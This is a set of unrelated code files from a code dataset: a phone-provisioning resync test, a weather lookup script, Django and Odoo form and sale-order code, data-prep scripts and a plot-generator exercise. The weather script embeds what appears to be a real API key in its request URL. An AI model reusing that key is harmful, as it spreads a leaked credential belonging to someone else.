US20528\n\nDescription:\n TFTP Resync:\n To verify if the resync is successful using TFTP through\n web profile rule.\n\n HTTP Resync:\n To verify if the resync is successful using HTTP through\n web profile rule.\n\n HTTPS Resync:\n To verify if the resync is successful using HTTPS through\n web profile rule.\n\nTopology:\n 1 One Phone\n 2 tftp server\n 3 http server\n 4 https server\n\nPass/Fail Criteria:\n TFTP Resync:\n Resync should happen successfully and the desired parameter change\n has to happen correctly.\n\n HTTP Resync:\n Resync should happen successfully and the desired parameter change\n has to happen correctly.\n\n HTTPS Resync:\n 1. Verify that custom ca file is installed successfully\n 2. Resync should happen successfully and the desired parameter change\n has to happen correctly.\n\nTest Steps:\n TFTP Resync:\n # Test Steps:\n 1. Set the phone to idle state\n 2. Create a resync file with the desired parameter to be changed\n and its value (For Eg: Resync Periodic as in this script)\n 3. Upload the resync file to tftp server\n 4. Set the profile rule in the phone web page.\n 5. Check that the value of the parameter has changed and\n then revert it back to the default value.\n\n HTTP Resync:\n # Test Steps:\n 1. Set the phone to idle state\n 2. Create a resync file with the desired parameter to be changed\n and its value (For Eg: Resync Periodic as in this script)\n 3. Upload the resync file to http server\n 4. Set the profile rule in the phone web page.\n 5. Check that the value of the parameter has changed and\n then revert it back to the default value.\n\n HTTPS Server:\n # Test Steps:\n 1. Set the phone to idle state\n 2. Install custom ca on phone by giving a valid Custom CA Rule\n from phone web page.\n 3. Verify that custom ca installation is successful.\n 4. Create a resync file with the desired parameter to be changed\n and its value (For Eg: Resync Periodic as in this script)\n 5. Upload the resync file to https server\n 6. Set the profile rule in the phone web page.\n 7. 
Check that the value of the parameter has changed and\n then revert it back to the default value.\n\nNotes:\n This script uses env variable \"domain_name\" as IPv6 addr for tftp and http\n e.g.\n [http]\n domain_name=[2009:10:74:121:8da5:9e2d:f155:1c2]\n\nKnown Bugs:\n\n\"\"\"\n\nimport tng\nimport logging\nfrom tng.api import concurrent\nimport os\nimport re\nfrom tng_sl.contrib.mpp.Toolkit3pcc import Toolkit3pcc\nfrom tng_sl.contrib.mpp.phone.ProvToolkit import ProvToolkit\nfrom tng.frontend.timing import wait\nfrom tng.frontend.timing import until\nfrom tng_sl.contrib.setup_helper import SetupHelpersTestCase\nfrom tng_sl.contrib.mpp.phone_line_reg_helper import PhoneConfigHelper\n\nlog = logging.getLogger('Resync_IPv6')\n\n\nclass Resync_IPv6(SetupHelpersTestCase, tng.api.TestCase):\n\n helpers = (PhoneConfigHelper,)\n helper_num_devices = 1\n\n @classmethod\n def setUpClass(cls):\n log.info(\"Start of setUpClass\")\n\n cls.RESYNC_PERIODIC_VALUE = \"20\"\n cls.DEFAULT_VALUE = \"40\"\n\n cls.tftp_prov = ProvToolkit(\"tftp\")\n cls.http_prov = ProvToolkit(\"http\")\n cls.https_prov = ProvToolkit(\"https\")\n\n log.info(\"Create xml file\")\n cls.resync_file_name = 'prov_periodic.xml'\n cls.resync_file_full_path = os.path.join(\n str(tng.api.get_logdirectory()), cls.resync_file_name)\n cls.toolkit.create_resync_xml_file(\n cls.resync_file_full_path,\n {\"Resync_Periodic\": cls.RESYNC_PERIODIC_VALUE})\n\n log.info(\"save phones'config and set phone idle\")\n # save phones' config and set phone to idle\n concurrent([\n cls.oPhone1.ui.save_config,\n cls.oPhone1.phone_set_idle])\n\n log.info(\"Set IP_Mode to Dual Mode\")\n cls.oPhone1.ui.set_param_value({'IP Mode': 'Dual Mode'})\n\n log.info(\"End of setUpClass\")\n\n def test_tftp_resync(self):\n\n log.info(\"Start test tftp resync\")\n tftp_resync_rule = self.tftp_prov.setup_provisioning_env(\n self.resync_file_full_path)\n tftp_rule = tftp_resync_rule['rule']\n tftp_ipv6 = 'tftp://[{}]/'.format(\n self.toolkit.get_test_env_info(\n section='tftp', parameter_name='ipv6'))\n pattern = 'tftp://(.*?)/'\n tftp_rule = re.sub(pattern, tftp_ipv6, tftp_rule)\n log.info(\"Set the tftp rule in web page\")\n self.oPhone1.ui.set_param_value({\"Profile Rule\": tftp_rule})\n\n self.oPhone1.ui.check_automation_ready(wait_reboot=15)\n\n until(\n self.oPhone1.ui.get_param_value,\n args=('Resync Periodic',),\n desired_result=self.RESYNC_PERIODIC_VALUE,\n raise_on_timeout=True,\n timeout=60,\n interval=5,\n raise_msg='Resync did not succeed over TFTP')\n\n log.info(\"TFTP resync successful, end of test tftp resync\")\n\n def test_http_resync(self):\n\n log.info(\"Start test http resync\")\n http_resync_rule = self.http_prov.setup_provisioning_env(\n self.resync_file_full_path, use_domain=False)\n http_rule = http_resync_rule['rule']\n\n http_ipv6 = 'http://[{}]/'.format(\n self.toolkit.get_test_env_info(\n section='http', parameter_name='ipv6'))\n pattern = 'http://(.*?)/'\n http_rule = re.sub(pattern, http_ipv6, http_rule)\n log.info(\"http rule is %s\" % http_rule)\n\n log.info(\"Set the http rule in web page\")\n self.oPhone1.ui.set_param_value({\"Profile Rule\": http_rule})\n\n self.oPhone1.ui.check_automation_ready(wait_reboot=15)\n\n until(\n self.oPhone1.ui.get_param_value,\n args=('Resync Periodic',),\n desired_result=self.RESYNC_PERIODIC_VALUE,\n raise_on_timeout=True,\n timeout=60,\n interval=5,\n raise_msg='Resync did not succeed over HTTP')\n\n log.info(\"HTTP resync successful, end of test HTTP resync\")\n\n def test_https_resync(self):\n\n 
log.info(\"Start test https resync\")\n primary_dns = self.toolkit.get_test_env_info(\n section=\"other\", parameter_name=\"primary_dns\")\n\n https_resync_rule = self.https_prov.setup_provisioning_env(\n self.resync_file_full_path)\n https_rule = https_resync_rule['rule']\n https_domain_v6 = 'https://{}/'.format(\n self.toolkit.get_test_env_info(\n section='https', parameter_name='domain_name_ipv6'))\n\n pattern = 'https://(.*?)/'\n https_rule = re.sub(pattern, https_domain_v6, https_rule)\n log.info(\" https rule :{}\".format(https_rule))\n log.info(\"Set Primary DNS\")\n self.oPhone1.ui.set_web_parameter_by_resync(\n Primary_DNS=['Primary_DNS', primary_dns])\n\n self.assertEqual(\n self.oPhone1.get_web_config('Primary_DNS')[0],\n primary_dns,\n \"Set Primary DNS fail\")\n\n log.info(\"Set the https rule in web page\")\n self.oPhone1.ui.set_param_value({\"Profile Rule\": https_rule})\n # after set profile rule, phone will do resync after a long time\n self.oPhone1.ui.check_automation_ready(wait_reboot=30)\n\n until(\n self.oPhone1.ui.get_param_value,\n args=('Resync Periodic',),\n desired_result=self.RESYNC_PERIODIC_VALUE,\n raise_on_timeout=True,\n timeout=60,\n interval=5,\n raise_msg='Resync did not succeed over HTTPS')\n\n log.info(\"HTTPS resync successful, end of test HTTPS resync\")\n\n def tearDown(self):\n log.info(\"Start of tearDown method\")\n log.info(\"Revert the parameter back to default value\")\n self.oPhone1.ui.set_param_value({\n \"Profile Rule\": '',\n \"Resync Periodic\": self.DEFAULT_VALUE})\n wait(5, 'set take effect')\n self.assertEqual(\n self.oPhone1.ui.get_param_value('Resync Periodic'),\n self.DEFAULT_VALUE)\n until(\n self.oPhone1.ui.get_param_value,\n args=('Resync Periodic',),\n desired_result=self.DEFAULT_VALUE,\n raise_on_timeout=True,\n timeout=60,\n interval=5,\n raise_msg='Revert the parameter fail!!!!')\n self.oPhone1.phone_set_idle()\n log.info(\"End of tearDown method\")\n\n @classmethod\n def tearDownClass(cls):\n log.info(\"Start of tearDownClass\")\n cls.http_prov.clean_provisioning_env()\n cls.https_prov.clean_provisioning_env()\n cls.tftp_prov.clean_provisioning_env()\n cls.oPhone1.ui.recover_config()\n log.info(\"End of tearDownClass\")\n\n\ndef main():\n tng.api.runner()\n\nif __name__ == '__main__':\n tng.run(main)\n","sub_path":"common/Provisioning/cmPROV20528_3pcc_IPv6_Resync_Web_ProfileRule.py","file_name":"cmPROV20528_3pcc_IPv6_Resync_Web_ProfileRule.py","file_ext":"py","file_size_in_byte":9355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"601378451","text":"#! 
python3\n# This program prints the current weather and the temperature (in degree Celsius) for a location from the command line.\n\nimport json, requests, sys\n\nAPI_key = \"XXXXXXXXXXXXXXXXXXXXX\" # your API key provided from openweathermap.org\n\nif len(sys.argv)>1:\n city = \"\".join(sys.argv[1:])\nelse:\n print(\"Usage: enter the city name to report you with\"\n \" the weather in that city for the next three days\")\n sys.exit()\n\nwebsitePage = requests.get(f\"http://api.openweathermap.org/data/2.5/weather?q={city}&APPID=985e65c7cc9580ca510e30af61d2f5ac\")\njson_text = websitePage.text\npython_code = json.loads(json_text)\n\nif \"city not found\" in json_text:\n print(\"city's name is invalid\")\nelse:\n weather = python_code['weather'][0]['description']\n temp = int(python_code['main']['temp']) - 273.15 # from Kelvin to Celsius\n print(f\"in {city}\\n\"\n '============================\\n'\n f\"the weather: {weather}\\n\"\n f\"current temperature is {temp:.2f}\\n\")\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":999,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"53192127","text":"from django import forms\n\nfrom .models import Cliente\n\nclass ClienteForm(forms.ModelForm):\n class Meta:\n model=Cliente\n fields=['nombres','apellidos','tipo',\n 'celular','estado']\n exclude = ['um','fm','uc','fc']\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n for field in iter(self.fields):\n self.fields[field].widget.attrs.update({\n 'class': 'form-control'\n })\n\n def clean(self):\n try:\n sc = Cliente.objects.get(\n descripcion=self.cleaned_data[\"descripcion\"].upper()\n )\n\n if not self.instance.pk:\n print(\"Registro ya existe\")\n raise forms.ValidationError(\"Registro Ya Existe\")\n elif self.instance.pk!=sc.pk:\n print(\"Cambio no permitido\")\n raise forms.ValidationError(\"Cambio No Permitido\")\n except Cliente.DoesNotExist:\n pass\n return self.cleaned_data","sub_path":"CERBEUS_v1_5/fac/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1023,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"18072870","text":"def compress_part(image):\n\t\"Compresses as part of bigger image\"\n\tpass\n\ndef get_difference(a, b):\n\treturn (a[0]-b[0])**2+(a[1]-b[1])**2+(a[2]-b[2])**2\n\ndef get_splits(image, width, height, block_width, block_height, DISPERSION_MAX, DIFFERENCE_MAX):\n\tblocks_w = int(width/block_width)\n\tblocks_h = int(height/block_height)\n\tblocks = [[None for i in range(blocks_w)] for j in range(blocks_h)]\n\t\n\tfor i in range(blocks_h):\n\t\tfor j in range(blocks_w):\n\t\t\tpos_i = i * block_height\n\t\t\tpos_j = j * block_width\n\t\t\tblocks[i][j] = image[pos_i:(pos_i+block_height if i != blocks_h else height)][pos_j:(pos_j+block_width if j != blocks_w else width)]\n\n\t#Here we save mean values of color in each block if it good for compression\n\tblocks_means = [[None for i in range(blocks_w)] for j in range(blocks_h)]\n\n\t#This cycle takes most part of time to execute\n\tfor block_i in range(blocks_h):\n\t\tfor block_j in range(blocks_w):\n\t\t\tblock = blocks[block_i][block_j]\n\t\t\tmean = [0, 0, 0]\n\n\t\t\tfor i in range(len(block)):\n\t\t\t\tfor j in range(len(block[0])):\n\t\t\t\t\tmean[0] += block[i][j][0]\n\t\t\t\t\tmean[1] += block[i][j][1]\n\t\t\t\t\tmean[2] += block[i][j][2]\n\n\t\t\tarea = block_width * block_height\n\t\t\tmean[0], mean[1], mean[2] = mean[0]/area, 
mean[1]/area, mean[2]/area\n\n\t\t\t#Dispersion shows us how color varies in block\n\t\t\tdispersion = 0\n\t\t\tfor i in range(len(block)):\n\t\t\t\tfor j in range(len(block[0])):\n\t\t\t\t\tdispersion += (block[i][j][0] - mean[0])**2 + (block[i][j][1] - mean[1])**2 + (block[i][j][2] - mean[2])**2\n\t\t\tdispersion /= area\n\n\t\t\tif dispersion <= DISPERSION_MAX:\n\t\t\t\tblocks_means[block_i][block_j] = mean\n\t#By labeling same blocks we could find grid\n\tblocks_labels = [[-1 for i in range(blocks_w)] for j in range(blocks_h)]\n\tnew_label = 0\n\n\tfor block_i in range(blocks_h):\n\t\tfor block_j in range(blocks_w):\n\n\t\t\tif blocks_means[block_i][block_j] != None:\n\t\t\t\t#If block doesnt exist or not chosen than we get infinity(that cannot pass next condintion)\n\t\t\t\tdl = get_difference(blocks_means[block_i][block_j], blocks_means[block_i][block_j-1]) if block_j-1>=0 and blocks_means[block_i][block_j-1] != None else float('+inf')\n\t\t\t\tdd = get_difference(blocks_means[block_i][block_j], blocks_means[block_i-1][block_j]) if block_i-1>=0 and blocks_means[block_i-1][block_j] != None else float('+inf')\n\n\t\t\t\tif dl <= DIFFERENCE_MAX and dd <= DIFFERENCE_MAX:\n\t\t\t\t\tif dl < dd:\n\t\t\t\t\t\tblocks_labels[block_i][block_j] = blocks_labels[block_i][block_j-1]\n\t\t\t\t\telse:\n\t\t\t\t\t\tblocks_labels[block_i][block_j] = blocks_labels[block_i-1][block_j]\n\t\t\t\telse:\n\t\t\t\t\tblocks_labels[block_i][block_j] = new_label\n\t\t\t\t\tnew_label += 1\n\n\tsplits_w, splits_h = [], []\n\tforward_labels = [False for i in range(new_label)]\n\tbackward_labels = [False for i in range(new_label)]\n\n\tfor block_i in range(blocks_h):\n\t\tfor block_j in range(blocks_w):\n\t\t\t#From left up to right down to find first appearence of label\n\t\t\tlabel = blocks_labels[block_i][block_j]\n\t\t\tif label != -1 and not forward_labels[label]:\n\t\t\t\tsplits_w.append(block_j * block_width)\n\t\t\t\tsplits_h.append(block_i * block_height)\n\t\t\t\tforward_labels[label] = True\n\n\t\t\t#From right down to left up to find last appearence of label\n\t\t\tback_block_i = blocks_h - block_i - 1\n\t\t\tback_block_j = blocks_w - block_j - 1\n\t\t\tlabel = blocks_labels[back_block_i][back_block_j]\n\t\t\tif label != -1 and not backward_labels[label]:\n\t\t\t\tsplits_h.append(back_block_i * block_height)\n\t\t\t\tsplits_w.append(back_block_j * block_width)\n\t\t\t\tbackward_labels[label] = True\n\n\tsplits_w = sorted(list(set([split for split in splits_w])))\n\tsplits_h = sorted(list(set([split for split in splits_h])))\n\n\treturn splits_w, splits_h\n\ndef compress(image, width, height, block_width, block_height, DISPERSION_MAX, DIFFERENCE_MAX):\n\tsplits_w, splits_h = get_splits(image, width, height, block_width, block_height, DISPERSION_MAX, DIFFERENCE_MAX)\n\tparts = [[image[split_h:split_h+block_height][split_w:split_w:split_w+block_width] for split_w in splits_w] for split_h in splits_h]\n\tcomp_parts = [[compress_part(parts[i][j]) for j in range(len(splits_w))] for i in range(len(splits_h))]\n\t#Need to define how split parts\n\tres = \"|\".join(map(\"|\".join, comp_parts))\n\treturn res","sub_path":"grid.py","file_name":"grid.py","file_ext":"py","file_size_in_byte":4125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"257893680","text":"#!/usr/bin/env python3\n\nimport os\nimport argparse\nimport csv\n\n\ndef read_data( source_dir ):\n utt=[]\n str=[]\n fpath=[]\n with open(os.path.join(source_dir, 'all.txt'), 'r') as f:\n reader = 
csv.reader(f, delimiter='|')\n max_rows = 30000\n skipped = 0\n for row in reader:\n filepath = os.path.join(source_dir, row[1])\n if( len(row[2]) > 40 and os.path.getsize(filepath)>40000 ):\n utt.append(row[0])\n fpath.append(filepath)\n str.append(row[2])\n max_rows-=1\n if max_rows<=0:\n break\n else:\n skipped += 1\n print(\"\\n\\nSkipped: %d\\n\\n\"%skipped)\n return (utt,fpath,str)\n\ndef save_data(a, utt, fpath, str):\n with open(a.text, 'w') as f:\n for u, s in zip(utt, str):\n f.write('%s %s\\n'%(u,s))\n\n with open(a.scp, 'w') as f:\n for u, fp in zip(utt, fpath):\n f.write('%s %s\\n' % (u, fp))\n\n with open(a.spk2utt, 'w') as f:\n f.write(\"LJ \")\n for u in utt:\n f.write('%s '%(u))\n f.write(\"\\n\")\n\n with open(a.utt2spk, 'w') as f:\n for u in utt:\n f.write('%s LJ\\n' % (u))\n\n\ndef main():\n print('Initializing Training Process..')\n\n parser = argparse.ArgumentParser()\n\n parser.add_argument('--scp', default=\"data/train/wav.scp\")\n parser.add_argument('--utt2spk', default='data/train/utt2spk')\n parser.add_argument('--spk2utt', default='data/train/spk2utt')\n parser.add_argument('--text', default='data/train/text')\n parser.add_argument('--source-dir', default='/mnt/local/TrainingData/Blizzard2013_Aligned/')\n\n a = parser.parse_args()\n\n (utt, fpath, str) = read_data(a.source_dir)\n save_data(a, utt, fpath, str)\n\nif __name__ == '__main__':\n main()","sub_path":"egs2/blizzard2013/tts1/local/process_bliz.py","file_name":"process_bliz.py","file_ext":"py","file_size_in_byte":1834,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"326848154","text":"from typing import List\nimport pandas as pd\n\nBASE_URL = \"https://www.leveropen.com/api/\"\nVERSION = \"v1\"\nDATE_FORMAT = \"%Y-%m-%d\"\nDATASET_FILTER_TYPES = [\"name\", \"collection\", \"topic\"]\n\n\ndef parse_categories(categories: List[dict]):\n return pd.concat(\n [\n pd.DataFrame(data=category, index=[idx])\n for idx, category in enumerate(categories)\n ]\n )\n","sub_path":"leveropen/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"326935686","text":"\"\"\"\nEscreva um programa que leia dois números inteiros e compare-os. mostrando na tela uma mensagem:\n- O primeiro valor é maior\n- O segundo valor é maior\n- Não existe valor maior, os dois são iguais\n\"\"\"\n\nfirst_number = int(input(\"Primeiro número: \"))\nsecond_number = int(input(\"Segundo número: \"))\n\nif first_number > second_number:\n print(\"O PRIMERIO número é o maior.\")\nelif first_number < second_number:\n print(\"O SEGUNDO número é o maior.\")\nelse:\n print(\"Os valores são iguais.\")\n","sub_path":"Curso em Video/Python/Mundo 2/Desafio 038.py","file_name":"Desafio 038.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"185026920","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n# Copyright: (c) 2014, Matt Martz , and others\n# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)\n\n# this is a windows documentation stub. 
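`read_data` above keeps only rows whose transcript is longer than 40 characters and whose audio file is larger than 40 kB; the same test as a standalone predicate (field layout `(utt_id, rel_path, transcript)` taken from the reader, thresholds kept):

```python
import os

def keep_row(row, source_dir, min_chars=40, min_bytes=40000):
    """Return True when a pipe-delimited row passes both size filters."""
    path = os.path.join(source_dir, row[1])
    return len(row[2]) > min_chars and os.path.getsize(path) > min_bytes
```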
actual code lives in the .ps1\n# file of the same name\n\nANSIBLE_METADATA = {'metadata_version': '1.1',\n 'status': ['removed'],\n 'supported_by': 'community'}\n\n\nfrom ansible.module_utils.common.removed import removed_module\n\n\nif __name__ == '__main__':\n removed_module(removed_in='2.8')\n","sub_path":"env/lib/python3.9/site-packages/ansible/modules/windows/_win_msi.py","file_name":"_win_msi.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"505338888","text":"# -*- coding: utf-8 -*-\n##############################################################################\n#\n# OpenERP, Open Source Management Solution\n# Copyright (C) 2017 Solucións Aloxa S.L. \n# Alexandre Díaz \n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Affero General Public License as\n# published by the Free Software Foundation, either version 3 of the\n# License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Affero General Public License for more details.\n#\n# You should have received a copy of the GNU Affero General Public License\n# along with this program. If not, see .\n#\n##############################################################################\n\nfrom openerp import models, fields, api\nfrom openerp.exceptions import ValidationError\nfrom openerp.tools import float_is_zero, float_compare, DEFAULT_SERVER_DATETIME_FORMAT\nfrom openerp.tools.translate import _\nfrom .consts import PRICE_TYPES\n\nclass sale_order_line(models.Model):\n _inherit = 'sale.order.line'\n\n # FIXME: Mejor usar atributos\n manzano_width = fields.Float(string=\"Width\", required=False)\n manzano_height = fields.Float(string=\"Height\", required=False)\n product_price_type = fields.Selection(PRICE_TYPES,string='Sale Price Type',related='product_id.sale_price_type')\n\n @api.constrains('manzano_width')\n def _check_manzano_width(self):\n for record in self:\n if not record.product_id.manzano_check_sale_dim_values(record.manzano_width, record.manzano_height)[0]:\n raise ValidationError(\"Invalid width!\")\n\n @api.constrains('manzano_height')\n def _check_manzano_height(self):\n for record in self:\n if not record.product_id.manzano_check_sale_dim_values(record.manzano_width, record.manzano_height)[0]:\n raise ValidationError(\"Invalid height!\")\n\n @api.onchange('product_id', 'manzano_width', 'manzano_height')\n def product_id_change(self):\n super(sale_order_line, self).product_id_change()\n\n if not self.product_id:\n return\n\n vals = {}\n product = self.product_id.with_context(\n lang=self.order_id.partner_id.lang,\n partner=self.order_id.partner_id.id,\n quantity=self.product_uom_qty,\n date=self.order_id.date_order,\n pricelist=self.order_id.pricelist_id.id,\n uom=self.product_uom.id,\n\n width=self.manzano_width,\n height=self.manzano_height\n )\n\n if product.sale_price_type in ['table_2d', 'area'] and self.manzano_height != 0 and self.manzano_width != 0 and not self.product_id.manzano_check_sale_dim_values(self.manzano_width, self.manzano_height)[0]:\n raise ValidationError(_(\"Invalid Dimensions!\"))\n elif product.sale_price_type == 'table_1d' and self.manzano_width != 0 and not self.product_id.manzano_check_sale_dim_values(self.manzano_width, 0)[0]:\n raise 
ValidationError(_(\"Invalid Dimensions!\"))\n\n name = product.name_get()[0][1]\n if product.sale_price_type in ['table_2d', 'area']:\n name += ' [Width:%.2f cms x Height:%.2f cms]' % (self.manzano_width, self.manzano_height)\n elif product.sale_price_type == 'table_1d':\n name += ' [\tWidth:%.2f cms]' % (self.manzano_width)\n if product.description_sale:\n name += '\\n' + product.description_sale\n vals['name'] = name\n\n if self.order_id.pricelist_id and self.order_id.partner_id:\n vals['price_unit'] = self.env['account.tax']._fix_tax_included_price(product.price, product.taxes_id, self.tax_id)\n self.update(vals)\n\n def product_uom_change(self):\n super(sale_order_line, self).product_uom_change()\n if not self.product_uom:\n self.price_unit = 0.0\n return\n if self.order_id.pricelist_id and self.order_id.partner_id:\n product = self.product_id.with_context(\n lang=self.order_id.partner_id.lang,\n partner=self.order_id.partner_id.id,\n quantity=self.product_uom_qty,\n date_order=self.order_id.date_order,\n pricelist=self.order_id.pricelist_id.id,\n uom=self.product_uom.id,\n fiscal_position=self.env.context.get('fiscal_position'),\n\n width=self.manzano_width,\n height=self.manzano_height\n )\n self.price_unit = self.env['account.tax']._fix_tax_included_price(product.price, product.taxes_id, self.tax_id)\n\n @api.multi\n def _prepare_order_line_procurement(self, group_id=False):\n self.ensure_one()\n vals = super(sale_order_line, self)._prepare_order_line_procurement(group_id=group_id)\n vals.update({\n 'manzano_width': self.manzano_width,\n 'manzano_height': self.manzano_height\n })\n return vals\n\n # BREAK INHERITANCE!!\n @api.multi\n def _action_procurement_create(self):\n \"\"\"\n Create procurements based on quantity ordered. If the quantity is increased, new\n procurements are created. 
If the quantity is decreased, no automated action is taken.\n \"\"\"\n precision = self.env['decimal.precision'].precision_get('Product Unit of Measure')\n new_procs = self.env['procurement.order'] #Empty recordset\n for line in self:\n if line.state != 'sale' or not line.product_id._need_procurement():\n continue\n qty = 0.0\n for proc in line.procurement_ids:\n qty += proc.product_qty\n if float_compare(qty, line.product_uom_qty, precision_digits=precision) >= 0:\n continue\n \n if not line.order_id.procurement_group_id:\n vals = line.order_id._prepare_procurement_group()\n line.order_id.procurement_group_id = self.env[\"procurement.group\"].create(vals)\n \n vals = line._prepare_order_line_procurement(\n group_id=line.order_id.procurement_group_id.id)\n vals['product_qty'] = line.product_uom_qty - qty\n new_proc = self.env[\"procurement.order\"].with_context(\n procurement_autorun_defer=True,\n ).create(vals)\n # Do one by one because need pass specific context values\n new_proc.with_context(\n width=line.manzano_width,\n height=line.manzano_height).run()\n new_procs += new_proc\n return new_procs\n\n# def product_id_change(self):\n# res = super(sale_order_line, self).product_id_change()\n# \n# vals = {}\n# if self.order_id.pricelist_id and self.order_id.partner_id:\n# vals['price_unit'] = self.env['account.tax']._fix_tax_included_price(product.price, product.taxes_id, self.tax_id)\n# self.update(vals)\n# return res\n","sub_path":"price_dimension/models/inherit_sale_order_line.py","file_name":"inherit_sale_order_line.py","file_ext":"py","file_size_in_byte":7216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"626784788","text":"#DSC 430: Python Programming - Assignment 0802: Plot Viewer\n#Student Name: Serena Yang\n#Date: Nov, 9, 2020\n#Video Link: https://youtu.be/EeO26eKQDNc\n#I have not given or received any unauthorized assistance on this assignment.\n\n\nimport random\n\n#when queried for a plot returns “Something happens”\nclass SimplePlotGenerator:\n \n #initial variable\n def registerPlotViewer(self, pg):\n self.pg = pg\n \n #in this situation, return \"something happens\"\n def generate(self):\n return \"Something happens\" \n\n#when queried for a plot returns a random plot produced from the seven files, extend SimplePlotGenerator\nclass RandomPlotGenerator(SimplePlotGenerator):\n #in this situation, return the plot by format\n def generate(self):\n\n #get each random word from 7 files\n name = random.choice(open('/Users/serenayang/Desktop/folder/plot_names.txt').read().splitlines())\n adjective = random.choice(open('/Users/serenayang/Desktop/folder/plot_adjectives.txt').read().splitlines())\n profesion = random.choice(open('/Users/serenayang/Desktop/folder/plot_profesions.txt').read().splitlines())\n verb = random.choice(open('/Users/serenayang/Desktop/folder/plot_verbs.txt').read().splitlines())\n adjective_evil = random.choice(open('/Users/serenayang/Desktop/folder/plot_adjectives_evil.txt').read().splitlines())\n villian_job = random.choice(open('/Users/serenayang/Desktop/folder/plot_villian_job.txt').read().splitlines())\n villain = random.choice(open('/Users/serenayang/Desktop/folder/plot_villains.txt').read().splitlines())\n\n #save as the format\n pg = name + ', a ' + adjective + ' ' + profesion + ', must ' + verb + ' the ' + adjective_evil + ' ' + villian_job + ', ' + villain + '.'\n return pg\n\n#when queried for a plot offers the user a list of five random plot_n, select each words from the fives\nclass 
InteractivePlotGenerator(SimplePlotGenerator):\n\n def generate(self):\n #using for loop to get 5 random lines and save in the list \n namelist = []\n for i in range(5):\n name = random.choice(open('/Users/serenayang/Desktop/folder/plot_names.txt').read().splitlines())\n namelist.append(name)\n #query user to select the name\n namechose = self.pg.queryUser(\"Chose a hero’s name from the following list: \\n\" + str(namelist) + '\\n')\n\n #same method as getting plot name\n adjectivelist = []\n for i in range(5):\n adjective = random.choice(open('/Users/serenayang/Desktop/folder/plot_adjectives.txt').read().splitlines())\n adjectivelist.append(adjective)\n adjectivechose = self.pg.queryUser(\"Chose a adjective from the following list: \\n\" + str(adjectivelist) + '\\n')\n\n #same method as getting plot name\n profesionlist = []\n for i in range(5):\n profesion = random.choice(open('/Users/serenayang/Desktop/folder/plot_profesions.txt').read().splitlines())\n profesionlist.append(profesion)\n profesionchose = self.pg.queryUser(\"Chose a profesion from the following list: \\n\" + str(profesionlist) + '\\n')\n\n #same method as getting plot name\n verblist = []\n for i in range(5):\n verb = random.choice(open('/Users/serenayang/Desktop/folder/plot_verbs.txt').read().splitlines())\n verblist.append(verb)\n verbchose = self.pg.queryUser(\"Chose a verb from the following list: \\n\" + str(verblist) + '\\n')\n\n #same method as getting plot name\n adjective_evillist = []\n for i in range(5):\n adjective_evil = random.choice(open('/Users/serenayang/Desktop/folder/plot_adjectives_evil.txt').read().splitlines())\n adjective_evillist.append(adjective_evil)\n adjective_evilchose = self.pg.queryUser(\"Chose a adjective evil from the following list: \\n\" + str(adjective_evillist) + '\\n')\n\n #same method as getting plot name\n villian_joblist = []\n for i in range(5):\n villian_job = random.choice(open('/Users/serenayang/Desktop/folder/plot_villian_job.txt').read().splitlines())\n villian_joblist.append(villian_job)\n villian_jobchose = self.pg.queryUser(\"Chose a villian job from the following list: \\n\" + str(villian_joblist) + '\\n')\n\n #same method as getting plot name\n villainlist = []\n for i in range(5):\n villain = random.choice(open('/Users/serenayang/Desktop/folder/plot_villains.txt').read().splitlines())\n villainlist.append(villain)\n villainchose = self.pg.queryUser(\"Chose a villain from the following list: \\n\" + str(villainlist) + '\\n')\n\n #get plot by format\n pg = name + ', a ' + adjective + ' ' + profesion + ', must ' + verb + ' the ' + adjective_evil + ' ' + villian_job + ', ' + villain + '.'\n return pg\n\n\n#responsible for displaying the results\n#I print to the console, but another viewer could 'extend' me into a advance smany GUI.\nclass PlotViewer:\n def registerPlotGenerator(self, pv):\n self.pv = pv\n self.pv.registerPlotViewer(self)\n \n #ask the user for some info if there needs me to\n def queryUser(self, str):\n return input(str)\n \n #call generate\n def generate(self):\n print(self.pv.generate())\n\n#responsible for displaying the results\n#I use some other means other than the console to interact with the user\nclass advancePlotViewer(PlotViewer):\n #I will inhereit registerDiceRoller \n\n def queryUser(self, str):\n #Here I might pop up a GUI window.\n pass\n \n def generate(self):\n #Here I present the roll in my GUI.\n pass\n\n\n#---------------------------------------------\npv = PlotViewer()\n\npv.registerPlotGenerator( SimplePlotGenerator() 
